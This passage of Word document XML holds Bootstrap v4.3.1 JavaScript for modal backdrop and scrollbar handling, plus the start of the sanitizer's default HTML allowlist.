        <w:t xml:space="preserve">        $(this._element).on(Event$5.CLICK_DISMISS, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (_this8._ignoreBackdropClick) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this8._ignoreBackdropClick = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return;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if (event.target !== event.currentTarget) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            return;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if (_this8._config.backdrop === 'static') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this8._element.focus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this8.hide();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});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (animate) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          Util.reflow(this._backdrop);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$(this._backdrop).addClass(ClassName$5.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!callback) {</w:t>
      </w:r>
    </w:p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(!animate) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          callback();</w:t>
      </w:r>
    </w:p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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        var backdropTransitionDuration = Util.getTransitionDurationFromElement(this._backdrop);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._backdrop).one(Util.TRANSITION_END, callback).emulateTransitionEnd(backdropTransitionDuration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } else if (!this._isShown &amp;&amp; this._backdrop) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._backdrop).removeClass(ClassName$5.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var callbackRemove = function callbackRemove() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this8._removeBackdrop();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            callback();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};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if ($(this._element).hasClass(ClassName$5.FADE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var _backdropTransitionDuration = Util.getTransitionDurationFromElement(this._backdrop);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this._backdrop).one(Util.TRANSITION_END, callbackRemove).emulateTransitionEnd(_backdropTransitionDuration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          callbackRemove();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 else if (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        callback();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----------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // the following methods are used to handle overflowing modals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    // todo (fat): these should probably be refactored out of modal.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    // ----------------------------------------------------------------------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_proto._adjustDialog = function _adjustDialog() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isModalOverflowing = this._element.scrollHeight &gt; document.documentElement.clientHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._isBodyOverflowing &amp;&amp; isModalOverflowing) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.style.paddingLeft = this._scrollbarWidth + "px";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(this._isBodyOverflowing &amp;&amp; !isModalOverflowing) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.style.paddingRight = this._scrollbarWidth + "px";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_proto._resetAdjustments = function _resetAdjustments() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.style.paddingLeft = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.style.paddingRight = '';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_proto._checkScrollbar = function _checkScrollbar() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var rect = document.body.getBoundingClientRect();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isBodyOverflowing = rect.left + rect.right &lt; window.innerWidth;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      this._scrollbarWidth = this._getScrollbarWidth();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_proto._setScrollbar = function _setScrollbar() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this9 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._isBodyOverflowing) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Note: DOMNode.style.paddingRight returns the actual value or '' if not set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        //   while $(DOMNode).css('padding-right') returns the calculated value or 0 if not set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var fixedContent = [].slice.call(document.querySelectorAll(Selector$5.FIXED_CONTENT));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var stickyContent = [].slice.call(document.querySelectorAll(Selector$5.STICKY_CONTENT)); // Adjust fixed content padding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(fixedContent).each(function (index, element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var actualPadding = element.style.paddingRight;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var calculatedPadding = $(element).css('padding-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(element).data('padding-right', actualPadding).css('padding-right', parseFloat(calculatedPadding) + _this9._scrollbarWidth + "px");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }); // Adjust sticky content margin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(stickyContent).each(function (index, element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var actualMargin = element.style.marginRight;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var calculatedMargin = $(element).css('margin-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(element).data('margin-right', actualMargin).css('margin-right', parseFloat(calculatedMargin) - _this9._scrollbarWidth + "px");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }); // Adjust body padding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        var actualPadding = document.body.style.paddingRight;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var calculatedPadding = $(document.body).css('padding-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(document.body).data('padding-right', actualPadding).css('padding-right', parseFloat(calculatedPadding) + this._scrollbarWidth + "px");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$(document.body).addClass(ClassName$5.OPEN);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_proto._resetScrollbar = function _resetScrollbar() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // Restore fixed content padding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var fixedContent = [].slice.call(document.querySelectorAll(Selector$5.FIXED_CONTENT));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(fixedContent).each(function (index, element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var padding = $(element).data('padding-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(element).removeData('padding-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        element.style.paddingRight = padding ? padding : '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }); // Restore sticky content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var elements = [].slice.call(document.querySelectorAll("" + Selector$5.STICKY_CONTENT));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(elements).each(function (index, element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var margin = $(element).data('margin-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (typeof margin !== 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(element).css('margin-right', margin).removeData('margin-right');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 // Restore body padding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var padding = $(document.body).data('padding-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(document.body).removeData('padding-right');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      document.body.style.paddingRight = padding ? padding : '';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_proto._getScrollbarWidth = function _getScrollbarWidth() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // thx d.walsh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var scrollDiv = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      scrollDiv.className = ClassName$5.SCROLLBAR_MEASURER;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      document.body.appendChild(scrollDiv);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var scrollbarWidth = scrollDiv.getBoundingClientRect().width - scrollDiv.clientWidth;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      document.body.removeChild(scrollDiv);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return scrollbarWidth;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Modal._jQueryInterface = function _jQueryInterface(config, relatedTarget)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$(this).data(DATA_KEY$5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = _objectSpread({}, Default$3, $(this).data(), typeof config === 'object' &amp;&amp; config ? config : {});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Modal(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$5,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data[config](relatedTarget);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else if (_config.show) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data.show(relatedTarget);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_createClass(Modal,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VERSION$5;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Default$3;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lastRenderedPageBreak/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Modal;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$(document).on(Event$5.CLICK_DATA_API, Selector$5.DATA_TOGGLE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var _this10 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var target;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var selector = Util.getSelectorFromElement(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      target = document.querySelector(selector);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var config = $(target).data(DATA_KEY$5) ? 'toggle' : _objectSpread({}, $(target).data(), $(this).data());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (this.tagName === 'A' || this.tagName === 'AREA') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var $target = $(target).one(Event$5.SHOW, function (showEvent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (showEvent.isDefaultPrevented()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Only register focus restorer if modal will actually get shown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$target.one(Event$5.HIDDEN, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if ($(_this10).is(':visible')) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this10.focus();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});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    Modal._jQueryInterface.call($(target), config, this);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$.fn[NAME$5] = Modal._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$5].Constructor = Modal;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$5].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$5] = JQUERY_NO_CONFLICT$5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Modal._jQueryInterface;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--------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Bootstrap (v4.3.1): tools/sanitizer.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * --------------------------------------------------------------------------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>
      <w:r>
        <w:t xml:space="preserve">  var uriAttrs = ['background', 'cite', 'href', 'itemtype', 'longdesc', 'poster', 'src', 'xlink:href'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ARIA_ATTRIBUTE_PATTERN = /^aria-[\w-]*$/i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DefaultWhitelist = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    // Global attributes allowed on any supplied element below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    '*': ['class', 'dir', 'id', 'lang', 'role', ARIA_ATTRIBUTE_PATTERN],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    a: ['target', 'href', 'title', 'rel'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    area: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    b: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    br: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    col: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    code: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    div: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    em: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    hr: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    h1: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    h2: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    h3: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    h4: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    h5: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    h6: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    i: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    img: ['src', 'alt', 'title', 'width', 'height'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    li: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
